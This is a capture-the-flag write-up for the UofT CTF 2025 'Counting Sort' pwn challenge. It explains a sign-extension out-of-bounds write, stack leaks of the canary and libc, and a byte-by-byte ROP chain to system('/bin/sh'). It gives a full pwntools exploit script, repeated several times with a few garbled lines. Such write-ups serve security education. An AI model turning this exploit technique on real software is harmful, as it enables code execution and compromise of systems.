UofT CTF 2025
Counting Sort [477 pts]
Did you know that the best time complexity for a sorting algorithm is O(n). This is an example service that demonstrates this by sorting your characters.
nc 5000
Author: White
extracting libc shenanigans
First of all, this challenge provides a Dockerfile that includes image that the binary runs on – for this, we need to extract the libc from the docker image. (including this because in the past when I didn’t know Docker I always struggled with this sort of stuff D:)
Assuming you have docker installed, you can run something like this docker run -v /home/user/Downloads:/home -i -t ubuntu@sha256:80dd3c3b9c6cecb9f1667e9290b3bc61b78c2678c02cbdae5f0fea92cc6734ab /bin/bash
to start a container for the image. Then, run ldd
on some binary (e.g. ldd /bin/cat
) to get the path of libc. Then copy that to /home
on the container, and you’ll find the libc on your local machine in /home/user/Downloads
Once you’ve extracted the libc, copy it to your current directory (where the echo
binary is located), and run pwninit
. Now you have a patched binary linking to the correct libc!
initial analysis
Okay that’s done. Now here’s the decompilation (Binary Ninja w/ renamed symbols):
int64_t sort() {
void* fsbase
int64_t rax = *(fsbase + 0x28)
int64_t s
__builtin_memset(s: &s, c: 0, n: 0x100)
int64_t* byte_freq_dict_addr = &s
void* input = malloc(0x200)
int32_t num_bytes_read = read(0, input, 0x200)
for (int32_t i = 0; i s< num_bytes_read; i = i + 1)
void* dict[input[i]] = byte_freq_dict_addr + sx.q(*(input + sx.q(i)))
*dict[input[i]] = *dict[input[i]] + 1
int32_t printed_count_1 = free(input)
for (int32_t i_1 = 0; i_1 s<= 0xff; i_1 = i_1 + 1)
int64_t* byte_freq_dict_addr_1 = byte_freq_dict_addr
byte_freq_dict_addr = byte_freq_dict_addr_1 + 1
uint32_t dict[i] = zx.d(*byte_freq_dict_addr_1)
int32_t printed_count = 0
while (true)
printed_count_1 = printed_count
if (printed_count_1 s>= dict[i])
printed_count = printed_count + 1
if (rax != *(fsbase + 0x28))
printed_count_1 = __stack_chk_fail()
return printed_count_1
int64_t main() {
return 0
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Stripped: No
Damn full protections D:
So this binary is a simple demonstration of counting sort. Nothing really special there. Instead, it’s more helpful to look a bit into the disassembly (or literally just try a bunch of different inputs and step through in the debugger):
0x13e4: movsx rdx, al
This little instruction is moving the value of one of the bytes we inputted into rdx
, but with movsx
. It will use rdx
to calculate what address to increment (the first half of counting sort).
I actually didn’t know what movsx
did, so I did a bit of research. Basically, it’s a sign-extended move
. What that means is that it treats al
as a signed integer. Why is this important? Well, all byte values greater than 0x7f
are interpreted as negative numbers…
The counting sort program expects for the bytes to be interpreted as unsigned integers, so it allocates an array of size 0x100 and calculates the address-to-increment as &byte_freq_dict + input[i]
. But since input[i]
is interpreted as a signed integer, we hae an OOB – an out-of-bounds write to negative indices!
awfully convenient pointer
The address of byte_freq_dict
is actually located on the stack! In fact, it’s merely 0x10 bytes before byte_freq_dict
itself. Importantly, this address stored on the stack is what’s used to calculate the address-to-increment. (There’s also a pointer to the heap allocation for our input, but I didn’t use it in my exploit).
So, with our negative OOB write, we can easily modify this to (mostly) whatever we want, and consequently modify addresses on the stack currently beyond our range of [byte_freq_dict - 0x80, byte_freq_dict + 0x7f]
. Naturally, I immediately thought of increasing the address by 0x100 (which takes one increment of the 2nd least significant byte of the pointer to byte_freq_dict
, i.e. offset &byte_freq_dict-0xf
). This would bring the saved RIP within our modification range.
ret2main + leaks yay
Now that the pointer to byte_freq_dict
points to byte_freq_dict+0x100
, we can modify the saved RIP, which currently points to main+28
, to point to the start of main
. The reason we simply loop back to main
is because we’ll have a lot more information by the end of this call to sort()
Why? Well, remember that counting sort has two parts to it. The first half was filling in the frequency count for each byte. The second half, for this program, is printing out the frequency array in order. For instance, (higher-level overview), if the frequencies are [3, 2, 4]
, where the first index represents A
, the counting sort program would print AAABBCCCC
Since the pointer to byte_freq_dict
is near the saved RIP now, this second half to counting sort will actually leak a lot of important addresses off the stack! We just count the frequency of each byte outputted, and then use that to reconstruct the addresses on the stack. This ends up leaking the stack, canary, ELF base, and libc base. Nice!
Anyways, coming back to rewriting saved RIP – there’s something important I have yet to mention. The counting sort only allows you to sort a maximum of 0x200 bytes. That’s actually a pretty major limitation. Why? Well, let’s consider the worst case scenario:
saved rip: 0x0101010101010101
desired: 0x0000000000000000
Modifying the saved RIP to our desired address would require us, for each byte, to increment from 0x1
to 0x0
(possible because of overflow). Each byte would take 0xff
increments, totalling 0xff*8
~ 0x800
increments. We definitely don’t have the space for that.
Thankfully, we don’t really run into this issue when modifying the saved RIP. Remember that the saved RIP is currently main+28
, and we want to modify it to main
. Well, in order to do this, we actually only have to modify the very last byte, since the rest of the addresses’ prefixes are the exact same! In our case, we’re incrementing 0xbc
to 0xa0
, which takes 0xe4
increments. In total, combined with the number of increments required to change the pointer to byte_freq_dict
(1 increment), it’s 0xe5
increments. Much less than 0x200
, so we’re golden!
However, our limit of 0x200
increments will become very important later on, so keep it in mind.
part 1 impl
Here’s the implementation for everything explained so far. For now, ignore the call to change_addr
. I’ll explain its necessity and show its implementation later.
#-------OVERWRITE SAVED RIP-------#
MAX_LEN = 0x200
SAVED_RIP = elf.sym.main+0x1c
def change_addr(original: int, new: int, offset: int, num_writes: int=0x8):
increase_BFD_0x100 = [OVERFLOW_CONSTANT - 0xf]
payload = bytes(increase_BFD_0x100 + change_addr(SAVED_RIP, elf.sym.main, 3*0x8))
assert len(payload) <= MAX_LEN
payload = payload.rjust(MAX_LEN, b'\x00')
send(payload, line=False)
#----------PROCESS LEAKS----------#
if 'GDB' in args: input()
out = p.recvrepeat(0.25)
leaks = [0 for _ in range(0x100)]
for i in out:
leaks[i] += 1
leaks = list(map(lambda leak: '{:02x}'.format(leak), leaks))
addresses = [int(''.join(leaks[i*8:(i+1)*8][::-1]), 16) for i in range(0x100//8)]
stack_leak = addresses[0]
canary_leak = addresses[1]
elf.address = addresses[3] - elf.sym.sort - 0x270
libc.address = addresses[5] - libc.sym.__libc_start_call_main - 122
roppity rop
At this point, once I got all my leaks, I was ready to start using ROP. I started looking for a way to use the heap pointer I previously mentioned (points to a heap allocation containing our input). I thought that I could potentially do some tcache shenanigans to get a pointer to the stack and then just write a ROP chain from stdin to the stack. But I never quite figured it out.
So, I turned to my backup plan: taking (abusing) the little incrementing thing I used to modify the saved RIP, and turning it into a write primitive.
Write-What*-Where** (sorta)
Here’s the implementation of change_addr
so you can understand how I implemented the write primitive:
def change_addr(original: int, new: int, offset: int, num_writes: int=0x8):
freqs = [0 for _ in range(num_writes)]
for i in range(num_writes):
freqs[i] = (new & 0xff) - (original & 0xff)
if freqs[i] < 0: freqs[i] = OVERFLOW_CONSTANT + freqs[i]
new >>= 8
original >>= 8
if sum(freqs) > MAX_LEN:
raise OverflowError(f'Too many writes {hex(sum(freqs))}\n{list(map(hex, freqs))}')
writes = []
for i in range(num_writes):
writes += [offset + i]*freqs[i]
return writes
Basically, we can abuse the incrementing part of counting sort, turning it into a write primitive. It’s contingent on a couple things, namely:
* we need to know what was previously written at that address
** we can only write to stack locations nearby the modified pointer to byte_freq_dict
, and there’s a limit to how much we can modify that pointer
Lucky for us, condition 1 is already satisfied (remember we leaked 0x100 bytes of the stack) and condition 2 isn’t a concern because we don’t need that much space to write our ROP chain.
Great! So now we can implement a simple write primitive, as shown above. The argument names are pretty self-explanatory, although note that num_writes
represents the number of bytes, not addresses, to write. Remember, we can only increment 0x200 times, so the number of bytes we fully modify is limited.
So, now we have a write primitive that will let us write to any nearby stack address whatever we want. But, we can’t write it all in one go, since we’re very limited in how many times we can increment an address. So how can we write in our ROP chain?
“infinite” loop
What we can do instead is simulate an infinite loop. Remember that we were able to previously overwrite the saved RIP to point to main
. Every time we write something in our ROP chain, we can just point saved RIP to main
But do we have enough space? Well, overwriting the saved RIP took only 0xe5
increments (including the 1 increment necessary to add 0x100 to the pointer to byte_freq_dict
), leaving us with more than 0x100
increments to write our ROP chain each iteration. This is guaranteed to be enough to modify a single byte to what we want – so we just write a byte every single time! *
* even if overwriting the saved RIP took 0x1ff
increments, we’d still be able to write our ROP chain. It would just be very, very slow, as we’re adding 1 for every single iteration of counting sort, and the sort()
function gives us a lot of output every time.
mom help the ROP chain is running away
There’s a slight issue we have to deal with, though. Every time we loop, the distance between our current saved RIP and our ROP chain increases by 0x8 bytes. In essence, the stack is growing (technically shrinking since the address of $rsp is decreasing), and we can’t really write the ROP chain on this changing stack, as the addresses will grow much faster than we can write to them (remember, we can only write a single byte at a time. the stack is growing away from us by 0x8 bytes at a time!).
Thankfully, this can be easily fixed. Take a look at the disassembly for main
Dump of assembler code for function main:
0x00000000000014a0 <+0>: endbr64
0x00000000000014a4 <+4>: push rbp
0x00000000000014a5 <+5>: mov rbp,rsp
0x00000000000014a8 <+8>: mov eax,0x0
0x00000000000014ad <+13>: call 0x11e9 <setup>
0x00000000000014b2 <+18>: mov eax,0x0
0x00000000000014b7 <+23>: call 0x1230 <sort>
0x00000000000014bc <+28>: mov eax,0x0
0x00000000000014c1 <+33>: pop rbp
0x00000000000014c2 <+34>: ret
The main
function (and every function, in fact) runs push rbp
at the very start. This creates more space on the stack. Typically, this doesn’t actually change anything because every function runs pop rbp
(or leave
) before the function returns. However, since we never let main
return, this never happens, causing our stack to grow by 0x8 bytes every time we call main
To fix this, we can simply overwrite saved RIP
with main+5
. This ensures that the stack doesn’t grow, and therefore we can freely write our ROP chain.
Also note that writing main+5
only changes the number of required increments from 0xe5
to 0xea
. We still have enough space to arbitrarily change a single byte, so our exploit doesn’t need to change anything about that – we can still do byte-by-byte modification!
flag time yay!
Now we can finally implement this writing process and finish the script! There’s just a few small extra steps in my implementation, which I’ll briefly mention:
- I grew the stack twice to allocate space for the ROP (I overwrote the saved RIP with
instead ofmain=5
twice) – pretty sure it’s not a necessary step, but I left in there because I was trying something out previously - In the very last step, I overwrote the saved RIP with a
gadget. Technically could’ve done this during the very last write of the ROP chain, but it was easier to implement this way
Anyways, here’s the whole process:
#==========BEGIN EXPLOIT==========#
#-------OVERWRITE SAVED RIP-------#
MAX_LEN = 0x200
SAVED_RIP = elf.sym.main+0x1c
def change_addr(original: int, new: int, offset: int, num_writes: int=0x8):
freqs = [0 for _ in range(num_writes)]
for i in range(num_writes):
freqs[i] = (new & 0xff) - (original & 0xff)
if freqs[i] < 0: freqs[i] = OVERFLOW_CONSTANT + freqs[i]
new >>= 8
original >>= 8
if sum(freqs) > MAX_LEN:
raise OverflowError(f'Too many writes {hex(sum(freqs))}\n{list(map(hex, freqs))}')
writes = []
for i in range(num_writes):
writes += [offset + i]*freqs[i]
return writes
increase_BFD_0x100 = [OVERFLOW_CONSTANT - 0xf]
payload = bytes(increase_BFD_0x100 + change_addr(SAVED_RIP, elf.sym.main, 3*0x8))
assert len(payload) <= MAX_LEN
payload = payload.rjust(MAX_LEN, b'\x00')
send(payload, line=False)
#----------PROCESS LEAKS----------#
if 'GDB' in args: input()
out = p.recvrepeat(0.25)
leaks = [0 for _ in range(0x100)]
for i in out:
leaks[i] += 1
leaks = list(map(lambda leak: '{:02x}'.format(leak), leaks))
addresses = [int(''.join(leaks[i*8:(i+1)*8][::-1]), 16) for i in range(0x100//8)]
stack_leak = addresses[0]
canary_leak = addresses[1]
elf.address = addresses[3] - elf.sym.sort - 0x270
libc.address = addresses[5] - libc.sym.__libc_start_call_main - 122
#---------GROW STACK AGAIN---------#
SAVED_RIP = elf.sym.main+0x1c # update SAVED_RIP since elf.sym.main is updated with elf.address
payload = bytes(increase_BFD_0x100 + change_addr(SAVED_RIP, elf.sym.main, 3*0x8))
assert len(payload) <= MAX_LEN
payload = payload.rjust(MAX_LEN, b'\x00')
send(payload, line=False)
#---------WRITE ROP CHAIN----------#
libc_rop = ROP(libc)
elf_rop = ROP(elf)
binsh = next(libc.search(b"/bin/sh\x00"))
max_payload_len = 0
originals = [stack_leak + 0xb0, stack_leak + 0x10, stack_leak + 0x8]
news = [libc.sym.system, binsh, libc_rop.rdi.address]
offsets = [i + GROW_CNT for i in range(FARTHEST_OFFSET, 3 - GROW_CNT, -1)]
assert len(originals) == len(news)
for i,o,n in zip(range(len(originals)), originals, news):
j = 0
while originals[i] and news[i] and originals[i] != news[i]:
payload = bytes(increase_BFD_0x100)
payload += bytes(change_addr(originals[i], news[i], offsets[i]*0x8 + j, num_writes=1))
payload += bytes(change_addr(SAVED_RIP, elf.sym.main+5, 3*0x8))
assert len(payload) <= MAX_LEN
max_payload_len = max(max_payload_len, len(payload) - len(increase_BFD_0x100))
payload = payload.rjust(MAX_LEN, b'\x00')
send(payload, line=False)
originals[i] >>= 8
news[i] >>= 8
j += 1
#------------WRITE RET------------#
payload = bytes(increase_BFD_0x100)
payload += bytes(change_addr(SAVED_RIP, elf.sym.main+0x22, 3*0x8))
assert len(payload) <= MAX_LEN
payload = payload.rjust(MAX_LEN, b'\x00')
send(payload, line=False)
#===========END EXPLOIT===========#
Run the script and we get a shell! cat flag.txt
for the flag :)
special thanks <3
Special thanks to White, the challenge author, for helping me out with infra issues. My challenge was generating too much output and consequently crashing the remote, and so he helped fix up the infra to let my solve work. Much appreciated! :)
full script
Anyways, here’s the full script:
# Useful references:
# https://gist.github.com/anvbis/64907e4f90974c4bdd930baeb705dedf
from pwn import *
import sys
import os
from time import sleep
#---------HELPER FUNCTIONS---------#
def get_leak(before: bytes, end: bytes=b'\n') -> int:
return int(p.recvuntil(end).decode('ascii')[:-1], 16)
def send(payload: bytes, before: bytes=b'', line: bool=True) -> int:
payload = payload + (b'\n' if line else b'')
if before == b'':
p.sendafter(before, payload)
args = list(map(lambda s: s.upper(), sys.argv))
_libcs = list(filter(lambda s: 'libc.so.6' in s, os.listdir()))
_lds = list(filter(lambda s: 'ld' == s[:2], os.listdir()))
elf = ELF("chall_patched") #------TODO------#
libc = ELF(_libcs[0]) if len(_libcs) else elf.libc
ld = ELF(_lds[0]) if len(_lds) else None
context.binary = elf
context.log_level = "DEBUG"
gdbscript = '''
# b *sort+396
# b *sort+479
b *sort+623
after read()
after memory write loop
ret after putchar() loop
if 'REMOTE' in args:
p = remote('', 5000) #------TODO------#
elif 'LOCAL' in args:
p = remote('localhost', 5000)
p = process([elf.path])
if 'GDB' in args: gdb.attach(p, gdbscript=gdbscript)
# sh = bytes(asm('mov rax, 0x68732f6e69622f; push rax; mov rdi, rsp; mov rsi, 0; mov rdx, 0; mov rax, SYS_execve; syscall;'))
movsx --> signed instruction --> input bytes > 0x7f leads to negative offsets
Stack format:
0x060: [Pointer to byte_freq_dict (BFD)] [Pointer to input chunk]
0x070: BFD[0x100]
0x170: [Pointer to 0x180] [CANARY]
0x180: [Pointer to 0x190] [Saved RIP (main+28)]
0x190: [Pointer to 0x230] [Another saved RIP (__libc_start_call_main+122)]
#==========BEGIN EXPLOIT==========#
#-------OVERWRITE SAVED RIP-------#
MAX_LEN = 0x200
SAVED_RIP = elf.sym.main+0x1c
def change_addr(original: int, new: int, offset: int, num_writes: int=0x8):
freqs = [0 for _ in range(num_writes)]
for i in range(num_writes):
freqs[i] = (new & 0xff) - (original & 0xff)
if freqs[i] < 0: freqs[i] = OVERFLOW_CONSTANT + freqs[i]
new >>= 8
original >>= 8
if sum(freqs) > MAX_LEN:
raise OverflowError(f'Too many writes {hex(sum(freqs))}\n{list(map(hex, freqs))}')
writes = []
for i in range(num_writes):
writes += [offset + i]*freqs[i]
return writes
increase_BFD_0x100 = [OVERFLOW_CONSTANT - 0xf]
payload = bytes(increase_BFD_0x100 + change_addr(SAVED_RIP, elf.sym.main, 3*0x8))
assert len(payload) <= MAX_LEN
payload = payload.rjust(MAX_LEN, b'\x00')
send(payload, line=False)
#----------PROCESS LEAKS----------#
if 'GDB' in args: input()
out = p.recvrepeat(0.25)
leaks = [0 for _ in range(0x100)]
for i in out:
leaks[i] += 1
leaks = list(map(lambda leak: '{:02x}'.format(leak), leaks))
addresses = [int(''.join(leaks[i*8:(i+1)*8][::-1]), 16) for i in range(0x100//8)]
stack_leak = addresses[0]
canary_leak = addresses[1]
elf.address = addresses[3] - elf.sym.sort - 0x270
libc.address = addresses[5] - libc.sym.__libc_start_call_main - 122
#---------GROW STACK AGAIN---------#
SAVED_RIP = elf.sym.main+0x1c # update SAVED_RIP since elf.sym.main is updated with elf.address
payload = bytes(increase_BFD_0x100 + change_addr(SAVED_RIP, elf.sym.main, 3*0x8))
assert len(payload) <= MAX_LEN
payload = payload.rjust(MAX_LEN, b'\x00')
send(payload, line=False)
#---------WRITE ROP CHAIN----------#
libc_rop = ROP(libc)
elf_rop = ROP(elf)
binsh = next(libc.search(b"/bin/sh\x00"))
max_payload_len = 0
originals = [stack_leak + 0xb0, stack_leak + 0x10, stack_leak + 0x8]
news = [libc.sym.system, binsh, libc_rop.rdi.address]
offsets = [i + GROW_CNT for i in range(FARTHEST_OFFSET, 3 - GROW_CNT, -1)]
assert len(originals) == len(news)
for i,o,n in zip(range(len(originals)), originals, news):
j = 0
while originals[i] and news[i] and originals[i] != news[i]:
payload = bytes(increase_BFD_0x100)
payload += bytes(change_addr(originals[i], news[i], offsets[i]*0x8 + j, num_writes=1))
payload += bytes(change_addr(SAVED_RIP, elf.sym.main+5, 3*0x8))
assert len(payload) <= MAX_LEN
max_payload_len = max(max_payload_len, len(payload) - len(increase_BFD_0x100))
payload = payload.rjust(MAX_LEN, b'\x00')
send(payload, line=False)
originals[i] >>= 8
news[i] >>= 8
j += 1
#------------WRITE RET------------#
payload = bytes(increase_BFD_0x100)
payload += bytes(change_addr(SAVED_RIP, elf.sym.main+0x22, 3*0x8))
assert len(payload) <= MAX_LEN
payload = payload.rjust(MAX_LEN, b'\x00')
send(payload, line=False)
#===========END EXPLOIT===========#
char is interpreted as a signed byte --> movsx is a sign extended move --> possible to write to negative offsets
stack looks like this:
0x060: [Pointer to byte_freq_dict (BFD)] [Pointer to input chunk]
0x070: BFD[0x100]
0x170: [Pointer to 0x180] [CANARY]
0x180: [Pointer to 0x190] [Saved RIP (main+28)]
0x190: [Pointer to 0x230] [Another saved RIP (__libc_start_call_main+122)]
offsets are calculated from &BFD
we can overwrite the [Pointer to byte_freq_dict (BFD)] and add 0x100 to BFD with a single increment at offset -0xf
from there, we can overwrite the saved RIP to point to main()
overwriting the saved RIP to point to main() fits in < 0x200 bytes because saved RIP originally points to main()+28
therefore, since the prefix bytes are the same, we only have to change a single byte (which is obviously < 0x200 bytes)
the output part of the counting sort will now leak a lot of info: stack, canary, elf base, libc base
returning to main() will grow the stack by 0x8 bytes, BFD stays in the same place
repeat the same process of increasing BFD by 0x100 and overwriting saved RIP to point to main() --> stack grows 0x8 bytes
now, there's enough space to write a simple system("/bin/sh") ROP chain
we can construct a write primitive that can write to anywhere relevant on the stack
then we repeat this for the number of bytes in our ROP chain:
1. increase BFD by 0x100
2. change a single byte to a byte of one of our ROP chain's addresses
3. change saved RIP to point to main() + 5 --> stack doesn't grow anymore
*note that we can only change a single byte at a time due to input space constraints:
1. input of 1 byte
2. input of < 0x100 bytes (need to arbitrarily modify a single byte)
3. input of < 0x100 bytes (need to arbitrarily modify a single byte)
with this, we can write our ROP chain right after the saved RIP
then we can, for the final modification:
1. increase BFD by 0x100
2. change saved RIP to point to a ret gadget in our ELF
again, it must be a ret gadget in the ELF in order for the overwrite to not change too many bytes
and with that, we get the flag!
special thanks to White for helping me with remote output issues
# uoftctf{r3m3mb3r_7h47_ch4r_15_516n3d_by_d3f4ul7}